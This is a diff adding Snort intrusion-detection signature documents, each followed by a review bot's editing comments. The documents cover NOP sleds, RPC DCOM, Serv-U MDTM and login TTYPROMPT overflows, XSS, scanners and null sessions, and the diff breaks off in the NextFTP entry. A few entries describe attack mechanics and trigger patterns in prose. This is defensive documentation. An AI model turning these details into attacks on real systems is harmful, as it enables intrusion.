+arbitrary code.  This procedure generally makes use of NOPs.
+
+--
+Detailed Information:
+The NOP allows an attacker to fill an address space with a large
+number of NOPs followed by his or her code of choice.  This allows
+"sledding" into the attackers shellcode.
+
+--
+Affected Systems:
+	All x86 based systems
+
+--
+Attack Scenarios:
+If a particular service was written using unsafe functions without
+bounds checking (strcpy(), strcat(), sprintf() etc...), it is possible
+to write arbitrary data to the address space of the service.
+Normally, this may just cause the program to die a horrible death.
+However, if you can get the return address to point to the beginning
+of the newly written data, it is possible to execute code of your
+choice.  This requires that the newly written data is actual
+executable data.  Since calculating exactly where the return address
+may point to is no small task, a popular technique is to pad the space
+leading up to your shellcode with NOPs.  This way, if the return
+address points anywhere in the series of NOPS, execution will slide
+down into your shellcode.
+
+--
+Ease of Attack:
+Not-so trivial.  This particular technique requires a knowledge of x86
+assembly coding, memory, and usually an intimate understanding of the
+code that one is attempting to exploit.  Unfortunately, there are
+hundreds upon hundreds of canned exploits that nearly anyone with the
+ability point-and-click can use and wreak havok with.
+
+--
+False Positives:
+The x86 NOP can frequently be found in day-to-day traffic,
+particularly when transfering large files. 
+
+--
+False Negatives:
+There are other techniques to emulate a NOP.  Additionally, if
+the attackers NOP sled is small enough (< 15), this particular attack
+may slip by.  Fortunately, NOP sleds are generally quite large.
+
+--
+Corrective Action:
+Determine if this NOP was part of an attack or simply part of an
+innocent stream of data.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+
+--
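Review bot: the threshold in False Negatives, `small enough (< 15)`, has no unit; say what is being counted (presumably consecutive NOP bytes required by the rule's content match) so the number means something. Attack Scenarios is written in the second person (`if you can get the return address`, `your shellcode`), unlike every other document in the patch; rewrite it in the third person. Spelling: `architecure`, `transfering`, `havok`, `unkown`, `attackers shellcode` (attacker's), and `NOPS` should be `NOPs`; `Not-so trivial` reads better as `Not trivial`.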
--- /dev/null
+++ b/doc/signatures/3295.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3295
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
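Review bot: this document duplicates `doc/signatures/3402.txt` word for word apart from the Sid; add a sentence on what rule 3295 matches that 3402 does not, otherwise an analyst seeing both events cannot tell them apart. The same fixes apply here: `Expoit code exists` typo, an explanation of how the `overly long filename via a network share` in Attack Scenarios relates to the `malformed data via RPC` in Detailed Information, and a vendor reference under Additional References.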
--- /dev/null
+++ b/doc/signatures/100000651.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000651
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "index.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
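Review bot: the Impact section (`system integrity compromise`, `execution of arbitrary code of the attackers choosing`) is the boilerplate used for the file include documents and overstates a cross site scripting bug in the `homepage` parameter; the realistic impact is the one Attack Scenarios gives, script running in a visiting user's browser and stealing information from that user. The second paragraph of Detailed Information (`execute system binaries`) has the same problem. Formatting: the `--` separators after `100000651`, after `All systems running CGI applications using MyPHP Guestbook` and after the contributor line lack the preceding blank line. Typo: `attackers choosing`.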
--- /dev/null
+++ b/doc/signatures/796.txt
@@ -0,0 +1,65 @@
+
+Rule:  
+
+--
+Sid:
+796
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is an EXCEL spreadsheet - e.g. businnesplan.xls.vbs gets displayed as
+businessplan.xls but is a visual basic script and not an EXCEL spreadsheet.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method. Warning:
+An EXCEL spreadsheet is in now way more secure than a visual basic script.
+Wrongly configured antivirus software my ignore this files and
+let a macro virus pass.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
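Review bot: the Summary says the rule `has been placed in deleted.rules` and superseded by sid 721, yet the rest of the file documents the old behaviour; either state that the text describes the retired rule or point the reader to 721's documentation. False Positives contradicts itself: `None Known` is followed by `Could be an error on sender's side.`; keep one. There is a stray `-` line after `None Known` under False Negatives, and Affected Systems is blank. Spelling: `superceded`, `businnesplan` (the next line spells it `businessplan`), `in now way` (in no way), `my ignore this files` (may ignore these files).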
--- /dev/null
+++ b/doc/signatures/1003.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1003
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
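Review bot: `Information gathering possible administrator access.` under Impact needs punctuation or a conjunction between the two items. In Detailed Information, `on the IIS implementation on the host, this may be the prelude` is a comma splice. More importantly the document never says what the rule matches (which file or path request triggers it), so `potential weakness` stays vague and the `None Known.` claim for False Positives cannot be checked; Additional References is also empty.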
--- /dev/null
+++ b/doc/signatures/2546.txt
@@ -0,0 +1,60 @@
+Rule:
+
+-- 
+Sid: 
+2546 
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Serv-U FTP server, namely the MDTM buffer overflow.
+
+--
+Impact:
+Serious. Denial of service is possible; when combined with shellcode,
+arbitrary code can be remotely executed with SYSTEM privileges.
+
+-- 
+Detailed Information:
+The vulnerability in question is a buffer overflow present in the handling 
+of the MDTM command in the RhinoSoft Serv-U FTP server for Windows. 
+
+The rule searches for an MDTM command which is not terminated within 100 
+characters; no valid command would be longer than this.
+
+--
+Affected Systems:
+All versions of RhinoSoft Serv-U FTP 4.2 and earlier.
+
+--
+Attack Scenarios:
+Several scripts exist to exploit this flaw, and shellcode is publicly available. 
+An attacker could either use one of these scripts, craft their own, or simply 
+manually enter an MDTM command which triggers the overflow after having logged 
+into a vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+-- 
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+-- 
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com> 
+
+-- Additional References:
+
+
+--
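Review bot: `-- Additional References:` puts the separator and the heading on one line; split them as in the other sections. Several separators carry trailing whitespace (`-- `), as do `Sid: ` and `2546 `. Additional References is empty although Attack Scenarios says scripts and shellcode are public and Affected Systems names versions `4.2 and earlier`; link the advisory the rule was written from. The note that the rule fires on an MDTM command `not terminated within 100 characters` is exactly the kind of detail the other files lack; keep it.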
--- /dev/null
+++ b/doc/signatures/629.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+629
+
+--
+Summary:
+This event is generated when the nmap port scanner and reconnaissance 
+tool is used against a host.
+
+When run with the '-O' option, it attempts to identify the remote  
+operating system.
+
+--
+Impact:
+Can provide useful reconnaissance information to an attacker.  Has been
+known to cause a denial of service on some older  hosts.
+
+--
+Detailed Information:
+nmap attempts to identify the remote operating system by looking for
+different services that are common or specific to  particular operating
+systems.  It also sends a variety of abnormal packets that are often
+handled differently by different  operating systems so that it can
+differentiate between them based on the responses.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+nmap is often used before an attempt to gain access to a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.  The signature may be produced by other scanners but is
+unlikely to be used for legitimate activity.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block any TCP packets that have the SYN, FIN, PUSH and URGENT flags set
+using a firewall.  Block only packets that have all four of the flags
+set as they are individually and in other combinations necessary for
+normal TCP traffic.  If you block them  individually or in other
+combinations your network will not function correctly.
+
+--
+Contributors:
+Original Rule Writer Unknown (prime suspect is Marty Roesch)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS05
+
+Nmap scanner:
+http://www.insecure.org
+
+--
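Review bot: Detailed Information describes generic OS fingerprinting, while False Positives and Corrective Action refer to one specific probe (`SYN, FIN, PUSH and URGENT flags set`); say in Detailed Information that this rule matches that flag combination so the reader sees why blocking it is the remedy and why `-O` is mentioned in the Summary. Double spaces appear inside sentences: `remote  operating`, `older  hosts`, `to  particular`, `different  operating`, `them  individually`. The blank line before `--` is missing after the last contributor line, and `Steven Alexander<alexander.s@mccd.edu>` needs a space before the address.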
--- /dev/null
+++ b/doc/signatures/1387.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+
+1387
+
+--
+Summary:
+
+This event is generated when an attempt is made to overflow a buffer in Microsoft SQL server.
+
+--
+Impact:
+
+A successful attack will allow an attacker to run arbitrary code on the SQL Server using the privileges of the account that SQL Server is running under typically, administrator.
+
+
+--
+Detailed Information:
+
+Microsoft SQL Server has a exploitable overflow in raiserror() function. An attack can inject the malicious SQL commands containing an overly long input in attempt to overflow the buffer.
+
+Moreover, the specifier will enable an attack to execute an arbitrary command in a memory space, leading to a total system compromise.
+ 
+
+--
+Affected Systems:
+
+	Microsoft SQL Server 7.0 
+ 	Microsoft SQL Server 2000
+	
+
+--
+Attack Scenarios:
+
+An attacker could send arbitrary queries to a SQL server through web applications.
+
+--
+Ease of Attack:
+
+Moderately difficult, since the exploit depends on an ability to inject SQL commands to the SQL server.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-22.html
+
+--
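Review bot: `Moreover, the specifier will enable an attack to execute an arbitrary command` introduces `the specifier` without saying what it is; if this refers to a format specifier passed to `raiserror()` then say so in the preceding paragraph, otherwise the sentence is unreadable. Grammar: `has a exploitable overflow in raiserror() function` (an exploitable overflow in the raiserror() function), `An attack can inject` (attacker), `in attempt to` (in an attempt to), and in Impact `running under typically, administrator` should be `running under, typically administrator`. Affected Systems contains whitespace-only lines (a space and a tab) that the other files do not have.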
--- /dev/null
+++ b/doc/signatures/112-3.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically a
+etherframe arp mismatch dst was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
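Review bot: the "Attack Scenarios" section is empty; either describe the scenario the spp_arpspoof check is built for (a host receiving ARP traffic whose Ethernet destination address does not match the hardware address carried in the ARP payload, as happens with forged ARP replies) or remove the empty heading. The Summary's "Specifically a etherframe arp mismatch dst was detected" needs "an" and reads like a raw alert string; rephrase as "an Ethernet frame / ARP destination address mismatch was detected". Also "consititute" in Detailed Information should be "constitute".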
--- /dev/null
+++ b/doc/signatures/1631.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1631
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
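Review bot: "unkown" on the Impact line should be "unknown", and this file lacks the "Affected Systems" section that the other signature documents carry between "Detailed Information" and "Attack Scenarios"; add it (for this generic chat rule, something like "All systems with IM or chat client software installed").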
--- /dev/null
+++ b/doc/signatures/2438.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2438
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
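Review bot: the "Affected Systems" entries "Real Networks RealOne Enterprise Desktop 6.0.11 .774" and "Real Networks RealOne Player 6.0.11 .868" appear to have a stray space inside the version number; verify against the vendor advisory and write the version as one token. "Additional References" is empty although the text describes a known vendor vulnerability; add the vendor advisory so readers can confirm the affected versions. The Corrective Action line also lacks a trailing period.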
--- /dev/null
+++ b/doc/signatures/3147.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3147
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+buffer overflow vulnerability affecting "login" via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the target host.
+
+--
+Detailed Information:
+The login binary is used when establishing an interactive session on a
+system. It is used locally and by protocols that allow remote access. A
+buffer overflow condition exists in some versions of login that can be
+triggered by the manipulation of environment variables.
+
+This event is generated when an attempt is made to overflow login via
+telnet by manipulating the TTYPROMPT environment variable.
+
+--
+Affected Systems:
+	Systems using Sys V derived login
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting 6 bytes of data followed
+by 65 characters and a newline into the TTYPROMPT variable.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
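Review bot: "Additional References" is empty for a specific, well-known login/TTYPROMPT overflow; add the CERT advisory and CVE entry so readers can confirm which login implementations are affected. Under "Affected Systems", "Systems using Sys V derived login" should spell out "System V", and the section would be more useful if it listed the operating systems named in that advisory.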
--- /dev/null
+++ b/doc/signatures/2024.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+2024
+
+--
+Summary:
+A vulnerability exists in Solaris snoop such that a remote attacker 
+could gain superuser access when used with the RPC service rquotad
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+Certain versions of the Solaris operating system use a program to
+monitor network traffic called Snoop. This program contains a flaw such
+that under certain conditions a buffer overflow can be caused by a 
+remote attacker.
+
+One such condition occurs when snoop tries to decode GETQUOTA requests
+to the RPC service rquotad. This daemon sends information regarding disk
+quotas on multi-user systems using remotely mounted shares via NFS. A
+specially crafted long request will trigger this overflow resulting in
+root access on the victim host.
+
+--
+Affected Systems:
+	Sun Solaris 2.4 _x86
+	Sun Solaris 2.4
+	Sun Solaris 2.5 _x86
+	Sun Solaris 2.5
+	Sun Solaris 2.5.1 _x86
+	Sun Solaris 2.5.1 _ppc
+	Sun Solaris 2.5.1
+	Sun Solaris 2.6 _x86
+	Sun Solaris 2.6
+	Sun Solaris 7.0 _x86
+	Sun Solaris 7.0
+
+--
+Attack Scenarios:
+An attacker can send a specially crafted long request to snoop via the 
+rpc.rquotad service such that it will generate a buffer overflow.
+
+--
+Ease of Attack:
+Simple although a requirement is that snoop should be running at the 
+time of attack.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are available for all operating systems and platforms listed as
+affected from Sun. These patches should be applied as soon as possible.
+
+See the Vendor site http://sunsolve.sun.com for details.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/864
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0974
+
+--
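Review bot: the Summary sentence ends without a period, and the "Affected Systems" entries use an underscore notation not found in the other files ("Sun Solaris 2.4 _x86", "Sun Solaris 2.5.1 _ppc"); write the architecture as "(x86)" / "(ppc)" or drop the underscore so the list reads consistently.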
--- /dev/null
+++ b/doc/signatures/2484.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+2484
+
+--
+Summary:
+This event is generated when a remote user attempts to access source.jsp
+on a Tomcat web server. This may indicate an attempt to exploit a
+directory traversal vulnerability.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in the
+source.jsp script. An attacker can use directory traversal techniques
+when accessing source.jsp to view hidden files and directories on the
+web server with the access privileges of the server. 
+
+--
+Affected Systems:
+	Apache Tomcat on Novell Netware 6.0
+
+--
+Attack Scenarios:
+An attacker can use directory traversal techniques when executing
+source.jsp to view directories and files on the web server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
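Review bot: "Additional References" is empty even though the text describes a specific Tomcat-on-NetWare source.jsp directory traversal; add the advisory or Bugtraq reference. The file is also missing the blank line between "Rule:" and the first "--" separator that every other file in this patch uses.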
--- /dev/null
+++ b/doc/signatures/1133.txt
@@ -0,0 +1,66 @@
+Rule:  
+ 
+--
+Sid:
+
+1133
+
+--
+Summary:
+This event is generated when the Cybercop vulnerability scanner is used 
+against a host.
+
+--
+Impact:
+Cybercop can be used to identify vulnerabilities on host systems.
+
+--
+Detailed Information:
+
+This particular packet is a part of Cybercop's OS identification.  
+Specially crafted packets are able to elicit different responses from 
+different operating systems.  This packet is likely to be part of a full
+Cybercop scan rather than an isolated event. 
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+Cybercop can be used by attackers to determine vulnerabilities present 
+on a host or network of hosts that could be used as attack vectors.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This tool can be used legitimately by system and network administrators.
+Other vulnerability scanners may display the same behavior.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+TCP packets with SYN, FIN and PUSH set at the same time are abnormal, 
+use a packet filtering firewall to block them.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS145
+
+--
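Review bot: layout nits: "Rule:  " and "-- " carry trailing whitespace, and the "False Negatives" block lacks the blank line before "--" that the other sections have. More substantively, the packet characteristic the rule keys on (SYN, FIN and PUSH set together) appears only under "Corrective Action"; state it in "Detailed Information" as well, where "This particular packet" is otherwise never described.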
--- /dev/null
+++ b/doc/signatures/394.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+394
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Host Unknown datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination's IP address is unreachable.
+
+--
+
+Impact:
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems or faulty routing devices.
+
+--
+
+Detailed Information:
+This ICMP message will be generated when the destination host specified in the datagram is unreachable.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no correct action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
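Review bot: "could indication routing problems" under Impact should be "could indicate routing problems", and "no correct action is necessary" under Corrective Action should be "no corrective action is necessary". "this type of ICMP datagrams" under Ease of Attack should be "this type of ICMP datagram". The file also omits the "Affected Systems" section present in the other documents; add "All" for consistency.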
--- /dev/null
+++ b/doc/signatures/530.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+530
+
+--
+Summary:
+This event is generated when an attacker sends a blank username and blank password in an attempt to connect to the IPC$ (Interprocess Communication) pipe.
+
+--
+Impact:
+Information gathering. This attack can permit the disclosure of sensitive information about the target host.
+
+--
+Detailed Information:
+Null sessions allow browsing of Windows hosts by the "Network Neighborhood" and other functions.  A Null session permits access to a host using a blank user name and password.  At attacker may attempt to perform a Null session connection, disclosing sensitive information about the target host such as available shares and user names.
+
+--
+Affected Systems:
+Microsoft Windows hosts
+
+--
+
+Attack Scenarios:
+An attacker can send a blank username and blank password to try to connect to the IPC$ hidden share on the target computer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Null sessions may be used by legitimate processes in the same Windows domain.  
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+On Windows NT, 2000, XP set the registry key /System/CurrentControlSet/Control/LSA/RestrictAnonymous value to 1.
+
+--
+Contributors:
+Original rule written by Ian Viket <ian.vitek@infosec.se>
+Documented by Nawapong Nakjang <tony@ksc.net, tonie@thai.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS204
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0519
+
+--
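Review bot: the registry path under Corrective Action is written with forward slashes and no hive: "/System/CurrentControlSet/Control/LSA/RestrictAnonymous" should read "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous". Also "At attacker may attempt" in Detailed Information should be "An attacker may attempt", and the contributor name "Ian Viket" does not match the e-mail address "ian.vitek@infosec.se"; check the spelling.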
--- /dev/null
+++ b/doc/signatures/2995.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2995
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
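Review bot: "an attempt is made to shutdown a Windows system" (Summary and Detailed Information) uses the noun form; the verb is "shut down". "Additional References" is empty; since the Corrective Action "Disallow remote registry manipulation" only makes sense if the reader knows the remote shutdown request is carried over the same remote registry interface, say so in Detailed Information and cite the Microsoft documentation. Minor: "None known." under False Positives versus "None Known." under False Negatives.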
--- /dev/null
+++ b/doc/signatures/308.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow condition in certain versions of NextFTP for Windows.
+
+--
+Impact:
